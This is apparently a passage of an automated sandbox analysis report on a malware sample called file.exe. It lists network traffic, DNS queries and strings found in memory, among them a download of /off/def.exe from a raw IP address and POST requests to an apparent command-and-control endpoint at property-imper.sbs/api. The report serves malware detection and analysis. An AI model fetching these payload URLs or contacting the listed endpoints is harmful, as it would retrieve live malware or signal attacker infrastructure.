        Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
        Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
        Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
        Source: file.exe, 00000000.00000003.2066572141.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
        Source: file.exeString found in binary or memory: http://185.215.113.16/off/def.exe
        Source: file.exe, 00000000.00000003.2066625567.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe~
        Source: file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
        Source: chromecache_103.6.drString found in binary or memory: http://schema.org/Organization
        Source: file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: file.exe, 00000000.00000003.1864650519.00000000053A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://aka.ms/certhelp
        Source: chromecache_103.6.drString found in binary or memory: https://aka.ms/feedback/report?space=61
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://aka.ms/msignite_docs_banner
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://aka.ms/pshelpmechoose
        Source: chromecache_103.6.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
        Source: chromecache_103.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
        Source: chromecache_103.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
        Source: file.exe, 00000000.00000003.1867096614.0000000005385000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
        Source: file.exe, 00000000.00000003.1867096614.0000000005385000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
        Source: file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://channel9.msdn.com/
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
        Source: file.exe, 00000000.00000003.1867096614.0000000005385000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
        Source: file.exe, 00000000.00000003.1867096614.0000000005385000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
        Source: file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: chromecache_103.6.drString found in binary or memory: https://github.com/Thraka
        Source: chromecache_103.6.drString found in binary or memory: https://github.com/Youssef1313
        Source: chromecache_103.6.drString found in binary or memory: https://github.com/adegeo
        Source: chromecache_103.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
        Source: chromecache_103.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
        Source: chromecache_103.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
        Source: chromecache_103.6.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://github.com/dotnet/try
        Source: chromecache_103.6.drString found in binary or memory: https://github.com/gewarren
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://github.com/js-cookie/js-cookie
        Source: chromecache_103.6.drString found in binary or memory: https://github.com/mairaw
        Source: chromecache_103.6.drString found in binary or memory: https://github.com/nschonni
        Source: file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
        Source: chromecache_103.6.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
        Source: file.exe, file.exe, 00000000.00000003.2066625567.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
        Source: file.exe, 00000000.00000003.2066625567.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/&
        Source: file.exe, 00000000.00000003.2066517041.0000000005384000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1934018659.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1913222049.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1933624756.0000000005384000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1933712433.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1913463757.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2066625567.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
        Source: chromecache_86.6.drString found in binary or memory: https://schema.org
        Source: file.exe, 00000000.00000003.1815246096.00000000053C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
        Source: file.exe, 00000000.00000003.1866501722.000000000547F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: file.exe, 00000000.00000003.1866501722.000000000547F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: file.exe, 00000000.00000003.1839835019.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1839554728.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1815246096.00000000053C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1839395842.00000000053B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
        Source: file.exe, 00000000.00000003.1815317910.0000000005394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
        Source: file.exe, 00000000.00000003.1839835019.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1839554728.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1815246096.00000000053C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1839395842.00000000053B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
        Source: file.exe, 00000000.00000003.1815317910.0000000005394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
        Source: chromecache_86.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
        Source: file.exe, 00000000.00000003.1867096614.0000000005385000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
        Source: file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: file.exe, 00000000.00000003.1867096614.0000000005385000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867046636.0000000005384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
        Source: file.exe, 00000000.00000003.1813657289.00000000053AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813740044.00000000053AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: chromecache_95.6.dr, chromecache_86.6.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
        Source: file.exe, 00000000.00000003.1866501722.000000000547F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
        Source: file.exe, 00000000.00000003.1866501722.000000000547F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
        Source: file.exe, 00000000.00000003.1866501722.000000000547F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: file.exe, 00000000.00000003.1866501722.000000000547F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: file.exe, 00000000.00000003.1866501722.000000000547F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
        Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
        Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
        Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
        Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
